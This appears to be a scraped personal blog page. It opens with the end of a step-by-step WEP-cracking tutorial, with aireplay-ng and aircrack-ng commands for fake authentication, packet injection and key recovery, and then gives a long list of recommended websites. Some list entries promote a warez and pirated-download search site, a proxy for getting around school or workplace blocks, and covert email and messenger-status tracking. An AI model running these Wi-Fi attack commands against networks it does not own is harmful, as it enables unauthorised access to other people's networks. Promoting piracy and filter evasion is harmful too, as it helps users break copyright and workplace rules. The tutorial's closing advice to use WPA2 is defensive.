aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
aireplayfakeauth.png

If this command is successful we will now generate many packets on the target network so that we can crack the KEY. Type:

airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
aireplaygenerateivs.png

This will force the access point to send out a bunch of packets which we can then use to crack the WEP key. Check your aerodump-ng shell and you should see the “data” section filling up with packets.

captureivs_0.png

After about 10,000-20,000 you can begin cracking the WEP key. If there are no other hosts on the target access point generating packets, you can try:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
aireplayattack2p.png

Once you have enough packets, you begin the crack:

aircrack-ng -n 128 -b [bssid] [filename]-01.cap

The “-n 128″ signifies a 128-bit WEP key. If cracking fails, try a 64-bit key by changing the value of N to 64.

crackng.png

Once the crack is successful you will be left with the KEY! Remove the : from the output and there is your key. So there you have it.

You can use these techniques to demonstrate to others why using WEP is a bad idea. I suggest you use WPA2 encryption on your wireless networks. Goodluck!

Monday, September 8, 2008

Google As A Hacking Tool 07/26/2008

This summary is not available. Please click here to view the post.

Fresh collection of interesting sites

Fresh collection of interesting sites:

1> Indian room mates :

Indianroommates is Complete Solution for Rent of Room, either You can Rent your Room or You can look for a Room.This is a best website for all the indian students who are planning to study in other countries as they can find rooms and accomodation without even going there and searching.The student just has to select the country and the city in which he wants the accomodation,results are then displayed on the screen and also the contact numbers of the owners are given so that you can directly speak to him and decide about the rent and other things.Most of the owners in the website are indian students who are willing to share their room or apartment.

2> Worldwide Timechecker :

This website allows you to find the present exact time in all the countries all over the world.We just have to select the country an click on it and then it shows us the time of that selected country.a very nicely designed website……

3> voicevibes :

This website is for all those telugu people of india who wants to listen to various hyderabad telugu FM radio channels online.All of the hyderabadis living outside hyderabad can now stop missing their city as now they can now stay informed about their city info all the time using this website.presently this website contains all the FM radio channels of hyderabad like the 98.3FM radiomirchi,93.5FM Sfm,101.9 FM Rainbow and Radiocity 91.1FM.

4> 5iles :

This is an amazing website for all the people who download various warez,movies,tv shows etc…..you can search for all your download links directly using this website.you just have to type the movie name or your required file name and click on search.Also here you have the advantage of 1)selecting from various uploaders like rapidshare,megashare,megaupload,file factory etc.2)This website also checks the links so that no dead links will be displayed to you.This website then searches various forums and gives the best results.definitely worth a try…….

5> Tinyload :

upload your files to 12 different file hosts at once from the tinyload website.its the best option for uploading of the media and other files.

6> Verify-email :

This email verification tool actually connects to the mail server and checks whether the mailbox exists or not.Clean your lists from bad and undeliverable emails.best thing is that we can know instantly about the fake mails and the spam mails.

7> Universal currency convertor :

The Universal Currency Converter® contains the top 85 currencies sorted by country name - listing the ten most popular currencies first. Special units and precious metals are listed both alphabetically and separately, at the end of this list. For every world currency, use to the XE Full Universal Currency Converter.

8> Dafont:

This website is for all the font lovers……there are over hundreds of fonts available for download in this website.The fonts presented on this website are their authors’ property, and are either freeware, shareware, demo versions or public domain. The licence mentioned above the download button is just an indication. Please look at the readme-files in the zips or check the indicated author’s website for details, and contact him if in doubt. If no author/licence is indicated that’s because we don’t have information, that doesn’t mean it’s free.

9> Xeeber :

This website is very useful for people who use yahoo messenger…….we can find out whether a person is online or in the invisible mode.we dont have to download any software but just have to type the user id in the box and click the button below which displays the status of the id……sometimes it shows that the system is busy but dont worry we have to try again till it shows the status.

10> deathclock :

For those of you who are interested in knowing your date of death can visit this site……..the person just has to fill in few details about their date of birth and others,then u will be shown your date of death…….just a fun website which according to me calculates the date of death by adding the average life expectancy rate to the given date of birth…….also after giving your date of birth details.it displays your time left to live in seconds which makes it a little bit scary to see your time dropping down…

11> Findsounds :

findsounds is a free site where you can search the Web for sound effects and musical instrument samples.you can get any sounds in any format…..for example sounds of musical instruments,sounds of animals,movies,actors etc…

12> Tryphone :

Try whichever phone you want online using this website and see how it actually works before buying it from the market.

13> Befunky :

befunky is a website where u can create pencil and colour sketches of any pics and share them with your friends and family or you can even save them to your desktop after creating the sketch.

14> Docstock :

docstoc is a user generated community where you can find and share professional documents. Find free legal documents and free business documents. Upload your documents for all the world to share.

15> iwantsandy :

sandy will be your new assistant.she’ll remember the details so you can focus on what’s important.Kick off your morning knowing what’s on for the day.Keep your day moving forward with reminders right when you need them.Books to read, people to call, your cousin’s birthday — I’ll remember it all.Stay organized with everyone in your life — effortlessly.

16> Arounder :

Take a virtual tour of Europe,America etc.AROUNDER gives travelers a vivid sense of what a city has to offer: historical cathedrals and works of art, museums featuring famous artists, local cafes and stores, breathtaking mountain-top views, quiet parks and gardens.Now you can take virtual tours of 30 European cities including Rome, Paris, Berlin, and Amsterdam and a sense of what a city has to offer like museums,mountains,stores etc.

17> gamejump :

lots of free games for mobile phones.you just have to register at that site and then u can start downloading the games for your mobile phones.

18> Bitbomb :

BitBomb is a text message reminder service. You schedule reminders at bitBomb, and then we send the reminder to your mobile phone via SMS at the appropriate time.There is no charge for bitBomb.com service, but your mobile phone provider may charge you for receiving an SMS message.

19> ListenToaMovie - lets you ?listen to a movie?, i.e. stream the audio part of various movies and some TV-shows.


20> Media convert is an online tool which helps to convert any file(audio,video,data etc…) from one format to the other format online on the internet without even downloading any software.The best part is we dont even have to registerfor that website.

21> www.imdb.com is the most comprehensive movie information source on the Net and it has won numerous awards. Gather facts about actors, movies, TV shows, trivia and all sorts of interesting stuff that pertains to the entertainment industry.

22> www.allrecipes.com all the food recipes that u can ever make and u can ever think are here…………just a perfect website for all food lovers and food cooks.

23> Zingfu
create a dumb face of your enemy or frenz and post it to them. just paste the face of your victim to any one one of the available funny photos…..its very simple to create.

24> Submit site to 40 sites

The social news web services are growing day by day. Digg, StumbleUpon, Reddit, Blogmarks, Netscape and many more exist and each one follows a different set of title, link and tags for successful submission.Social Poster will help you to do just that. You can enter the title, url and description and tags once for your blog post and then hit the “Generate” button, it’s ready for submission to 40 sites.

25> Free 50gb online space
ADrive LLC (ADrive.com) leads the free online data storage community, offering the largest amount of free storage on the Internet.ADrive serves as an online, centralized vault for all file types including: music, videos, photos, documents, and more.ADrive was designed to meet the demands of our data-intensive world.

26> logon to www.photosite.com and register urself freely.
it provides u free unlimited foto uploading and domain name of ur choice.
u can maintain ur albums and share it with ur friends.

27> .flashface
make anybody’s face using this website…it is really cool

28> http://converttube.com/

convert any online video/s and then download it. here’s the most awaited site ………. this site not only does convert ur video but also download it for free. heyy but it takes a bit of time.

29> Spypig is a Free email tracking system that lets you know when the email you sent has been read by recipient. It works with virtually all modern email programs: Outlook, Eudora, Yahoo Email, Gmail, Hotmail, AOL Email and many others. Cool tool and it’s free!

30> Deezer : is a very good site where you can find massive amounts of songs to listen to (you can´t download them, only listening is allowed).

31> MintEmail : generates a disposable email for you as soon as you load the page and even automatically saves it to your clipboard for you. If you need an temporary email address for longer than four hours, you can create a custom minemail.com email address that will forward all emails to your real address.There’s more! MintEmail will automatically verify the email address and notify you via the title bar when your email has arrived.

32> Contactify :Create your own personal contact form. Contactify creates the link, people click on it and then they can send you a message without you ever having to reveal your email address. Anyone who has ever put an email address online can appreciate the benefit of this! And it’s free. Registration is super fast.

33> Wordsmith :If you are a die hard word lover, this is the site for you. It emails you new word every day with meaning, its origin etc. Subscription is free and very easy. It has half a million subsribers !

34> flauntR : While the basic image editing features in FlauntR are no different from other, what impressed the most are the variety of photo frames, textures and light effects that you can apply to digital images in a click. This is very handy when you have to quickly finetune a web image or a family picture but there is no graphics software like Photoshop, GIMP or Picasa installed on you computer.

35> Flvix is a free online video converter that will convert videos from Youtube, Google Video to the formats AVI, MOV, MP4, 3GP, MP3.

36> FilesTube is a search engine designed to search files in various file sharing and uploading sites. Search for “All” or by media type (mp3, wma, zip).

37> Mango Languages has launched a in beta. Mango is an online tool for learning a language - Spanish, Russian, French, Italian and more. There is also option for English for Spanish speakers and English for Polish speakers.

38> Empressr : online, ajax-powered presentation software. Impressive looking … and free!

39> Daytipper: Welcome to Daytipper. Based on the premise that everyone is an expert on something, Daytipper collects tips from a variety of areas (home, food, gardening, tech etc) and if they like your tip, they’ll pay you $3 for it as well!
Daytipper is obviously really new and some of the tip categories are a little lean, but I’m sure once the word gets around a bit, the tips will start flowing in. A great site to add to your newsreader.

40> If you’re looking for a nice and different way to display your photos on your website, you really should go and have a peek at Good Widgets. Currently Good Widgets offers 3 different photo display widgets - the book, the stack and the slideshow. Each one is customizable to suit your site. Also, each is available in two flavours - free but has the Good Widgets logo and a smaller number of photos per widget OR Standard, which is priced from $2 to $4 and doubles the number of photos.

41> Phixr - Online Photo Editor is a site that can come in handy whenever your regular photo editor isn’t handy. Perhaps on vacation or at a family members for Thanksgiving?
Simply upload a photo (or point to the photo’s url), edit the photo with some easy to use photo tools (crop, rotate, sharpen, color balance, convert to black & white etc). Phixr actually has a nice selection of tools! To finish, either save your photo, email it or upload it to a photo site such as flickr, all from within phixr.

42> LabPixies - Coolest Gadgets On The Web - whatever your flavour of personal start page, LabPixies has a good selection of gadgets to add. Most available for Google and Windows Live and many available also for Pageflakes and Netvibes, with easy click-to-add functions.

43> With Musicovery : interactive webRadio you can determine what music to listen to by your mood, define it by genre or narrow it down to a particular decade. Choose to hear only only hits or only non hits or set it to discovery mode to, um …discover. Make your picks then watch musicovery deliver just the right musical choices for you. I like!

44> Signbot - make your own animated scrolling text LED sign. Write your text, select a sign width then generate to add to your MySpace or website or use as your forum sig or avatar. The generator will generator regular and LiveJournal-specific code.

45> http://www.freeunblocker.net : Can’t surf your favorite sites such as mySpace at school? Employer blocked most wanted sites? There is a way out. Just enter a URL in the box and hit Navigate!

46> Gimpology: Tutorials and resources for the GIMP done digg style, with ratings and comments.
A great resource for the Photoshop-alternative GIMP.

47> BloggBuzz: like digg for bloggers
Seems that bloggers don’t get much love on Digg. So now, bloggers have a new tool to promote their blog posts. Blogg-Buzz is “a blogger driven site, exclusively for bloggers … to share, discover and promote blog posts they find interesting.”

48> Widgipedia: for all your widget needs

Web widgets, desktop widgets, widget resources, samples, tutorials web and desktop widgets and resources, all nicely categorized.

49> Simple todo list manager: Todoist is a simple, efficient and dynamic todo list manager, aimed at getting us organized it “Getting Things Done” fashion. Free sign up required to get started.

50> Goodreads see what your friends are reading and keep track of what you’ve read and what you’d like to read. Goodreads allows users to rate books, so it’s easy to see which books are hits with people you know

51> BigString.com - The World’s Coolest Email allows you to recall any sent email for those inevitable moments of email remorse. Free, and paid Premium/Business Accounts available.

52> Newseum: Newspaper Front Pages from around the World: 495 front pages from 50 countries. See how papers all over the place are covering a story. Interesting.

53> Kool IM - log in to many popular messenger services at the same time through Kool IM. The services include ICQ, Yahoo, MSN and Google Talk.

54> PDF Online :Simply upload the document you want to convert to PDF and voila it’s done!

55> Zapr - Really Simple Sharing is not just another Drop Send clone. You don’t have to upload anything. You can share files by having them retrieve the files right from your computer.

56> PollDaddy is simple and flexible, allowing you to customize the styles to match your website or email campaign. Deliver your poll through JavaScript, direct link, widget or RSS feed. And free, too. Currently in public beta.

57> dodgeit - free. receive-only. email. no set up. rss. for those times when you have to give an email but you really don’t want to give one that you actually use.

58> Online Alarm Clock - Sometimes, the very simplest tools are the most useful. I can think of ways this would be useful. If you can too, head on over and bookmark for future use.

59> Foxit Software released v 2.0 of it’s free PDF Reader, a great alternative to Adobe’s Reader. Combine the free Foxit PDF Reader with the Firefox PDF Download Extension and Bob’s your uncle.

60> Hockneyizer: Create a simulated collage from a single photograph - a couple of styles to chose from to create a unique photo presentation.

61> “Jump2Mail is a free web-based email retrieval application, check all your email-box from one central place - completely free, from any computer, anywhere in the world.” Jump2Mail also integrates other features, such as: - Planning/Diary.
- Reminder.
- Task Manager.
- Filtering Anti-Spam.
- Personal rules.
- Contact management System.
- Bookmark manager (in Ajax).
- RSS Reader (in Ajax).
- RSS Feed of the new malls (in progress).
- Available in 7 different languages.
- 5 different graphic topics. Jump2Mail was is itch-scratch ware, created by a group of web developers to meet a need and now released for free for others to use

62> “Mon.itor.usis the only external website monitoring service which provides commercial grade distributed monitoring services absolutely for FREE.” Monitor.us service is free and there are no limits on the number of sites monitored. Get notifications via RSS feeds or email, performance reports and customizable metrics and a desktop workspace.

63> ClockLink From their websites “provides fashionable clocks that you can easily embed in your web page. All you need to do is simply paste the tag on your web page. Our clock will display the city name of your choice if you choose. You can also choose a time zone for your clock so it will show the correct time.”

64> Free Image hosting - Stylish, trendy, flexible From their site - “Thumbq is a straight-forward image hosting solution that makes uploading and sharing images easy as never before. Thumbq has got Lovely galleries, beautiful eye catching slideshows, the most simple interface to upload and manage your images. Thumbq lets you host and link images, run stunning galleries and slideshows on your webpage with full freedom.”
Thumbq allows upload of up to 10 image files at once, with a limit of no more than 5MB per image. There is no limit on the number/total size of store images.

65> Add chat to your own site Chatcreator.com If you’ve ever thought about adding a chat box to your site but didn’t want to mess around with scripts or didn’t like the look of some of the pre-made ones, you might want to take a look at Chat Creator. You can give your chat box a title, control it’s size, color and font-family and then add it to your website by simply adding a couple of lines of code.

66> Mypictr - is an online image resizer that is perfectly suited for creating a custom sized profile image but could also be used for any quick and easy image resizing needs.
mypictr offers a handy dropdown box for a bunch of social networks, which will spit out the correct sizing for each one. There are also some generic sizing options as well as (I assume) the ability to just plug in your own dimensions. Once resized, you can download the image to your own computer. Images are not retained on mypictr.

67> Textorizer - vectorise a picture using text strings. To use the cool textorizer generator, simply point to an image on the web, enter the text to add, set some size and effect controls and then Textorize! Neat effect.

68> LetterPop: Easily make a newsletter in minutes is a new Newsletter generator, featuring a nice (ajax) interface and some good looking premade templates. And it’s free. Great for family, group or even small business use.

69> Clock Screensaver:
Would you like your screensaver to display the time? Here’s a small (472kb) Windows screensaver program to download and install that contains 14 different clock screensavers.

70> Zamzar - Free online file conversion - without downloading or installing anything!
Zamzar converts to a wide range of image, document, audio and video formats. The maximum file size is limited to 100MB.

71> gabmail : Free Video Mail
gabmail : Free Video MailIf you’d like to be seen as well as heard, check out Gabmail - a free, video email tool, that requires no download, installation or registration.

72>AmbientClockis about more than telling time. At a glance, it shows you your events for the day. The backlighting changes color prior to your next appointment to subtly get your attention, as well.
This online beta will hook up your Google Calendar with a Google Personal Homepage gadget, and wrap your daily schedule around the clock.

73> Online Icon Maker- create your own icons in an online free editor - A quick and easy way to create your own unique icon or favicon. Use their editor or create a favicon from a picture on your computer.

74> Estimate value for an established website or domain name

CODE
http://www.sitestimator.com

75> Jim Tipton’s Find a Grave is an online database with 16 million cemeteries and burial records - you can find grave location of almost all famous people.

A neat thing about Find a Grave is that you can add virtual memorials and flowers on a loved one’s grave.

CODE
http://www.findagrave.com/

76> Very weird site with lots of pages of stuff that messes with your subconscious mind.
http://www.subliminalmessages.com/

77> GrayZone is a professional consulting firm that provides investigative, paralegal and research services to members of the entertainment community. Clients include record labels, music publishers, computer software companies, law firms, investigative agencies, recording artists, producers and fashion designers.

In operation since 1986, GrayZone specializes in high-tech Internet investigations involving bootleg, counterfeit, and pirated product. GrayZone has been dubbed the “bootbusters” of the entertainment industry.

CODE
http://www.grayzone.com/index.html

78> www.T5F.NET

(very useful one)
now you can stop spam.. and can be fearless… use it at your ease.. anywhere anytime.. a email is ready to be used
NOT ONLY THAT SPECIAL FEATURE is that..
when you visit the website it will be copy automatically to your clipboard just start using

79> Computer Stupidities..!!
http://rinkworks.com/stupid/cs_web.shtml

80> .Language Transelationzz
http://world.altavista.com/

81> oops list(time pass)
http://www.micom.net/oops/

82> Mobile related websites

www.mobango.com
www.mobile9.com
www.mobilecontentplanet.com
www.mobilejunkies.net
www.candyman.com
www.crazy4mobilez.com
http://www.nidokidos.org/
http://www.mobuniverse.com/
http://www.mobilesmania.com
www.symbian-mobile.org
www.mobineedz.info
www.getjar.comwww.zedge.net

83> Mobile 3gp videos:

www.mobile9.com
www.zedge.net
www.free-3gp-video.com
3gp music vdos:
www.mv3gp.com



84> gamess….!!!

http://www.download-free-games.com/
http://www.download-game.com/
http://www.gametop.com/
http://www.funpcgame.com/
http://www.terragame.com/
http://www.free-windows-games.com/
http://www.worldoffreegames.com/
http://www.bluedojo.com/
www.abc.go.com
www.psygnosis.com
www.mindspace.com
www.nazaragames.com
www.microsoft.com/games
www.shockblitz.com
www.simthemepark.com
www.gamesdomain.com
www.indiagames.com
www.gamesville.com
www.lycoszone.com
www.leftfoot.com
www.funbrain.com
www.blakkat.com
www.nintendo.com
www.gungames.com
www.huronline.com
www.gamesdomain.com
www.komando.com
www.mortalcombat.com
www.aylic.com
www.leftfoot.com
www.gamebot.com
www.happypuppy.com
www.station.sony.com
www.avana.net
www.riddler.com
www.phrazzle.co.uk
www.gamesdepot.com
www.amo.qc.ca
www.free-gaming.com
www.arcadegamesonline.com
www.plusmedia.com
www.bytesize.com
www.piginc.org
www.nuclearnet.com
www.diablopro.com


85> Encyclopedia

www.encyclopedia.com
www.encarta.msn.com
www.britannica.com
www.ntreasearch.com
www.kids.infoplease.com
www.letsfindout.com
www.boatshowusa.com
www.encyclozine.com
www.libraryspot.com
www.shotokai.cl
www.emulateme.com
www.wikipedia.com


86> Photography

www.photographyreview.com
www.agfaphoto.com
www.indiaphotography.com
www.masters-of-photography.com
www.photodisc.com
www.indialight.com
www.photoindia.com
www.photocentreindia.com
www.onlinephotography.com
www.photographymuseum.com
www.photoresource.com
www.sightphoto.com
www.kodak.com
www.digital-photography.org
www.photolinks.net
www.thephotosite.com
www.arteffects.com

87> Literature

www.vrindaindia.com
www.amedeo.com
www.litrature.org
www.iranonline.com
www.afganonline.com
www.ethiopiaonline.com

88> History

www.historychannel.com
www.thehistorynet.com
www.history.com
www.historyhouse.com
www.historyinternational.com
www.historyplace.com
www.historyoftheworld.com
www.hyperhistory.com
www.womeninworldhistory.com

89> Maps
www.mapquest.com
www.map.org
www.map.com
www.emagame.com
www.maptown.com
www.thomas.com
www.chicagomap.com
www.mapacademy.com
www.3datlas.com
www.4maps.com

90> Dictionaries
Acronym Finder
American Heritage Dictionary
British National Corpus
Encarta World English Dictionary
Idiom Connection
Lexicool
Oxford English Dictionary
Roget’s Thesaurus
Rhyming Dictionary
Synonym Dictionary



SOME COOL FLASHES:

1. FLASH DJ

2. PLAY THE DRUMS

3. TURKEY SHOOTER

4. BUGGING

5. ACNE

6. DANCE

7. BUBBLE WRAP

8. FIGHT

9. FINALE

10. BABY QUEEN -VERY GOOD ONE

11. EUROPE AND ITALY

12. ILLUSION

13. KITTEN SHOOT

14. SINGING HORSES

15. HOLES

16. CAT

17. MINIPUTT

18. PENGUIN

19. BEATS -VERY GOOD ONE

20. ROCK BAND

21. RAP

22. SEE IT

23. SMOKE KILLS -VERY GOOD ONE

24. FIETS

25. SNAKE

26. TERROR

27. COOL ONE

url:http://sanjaypatel.weebly.com/intresting-sites.html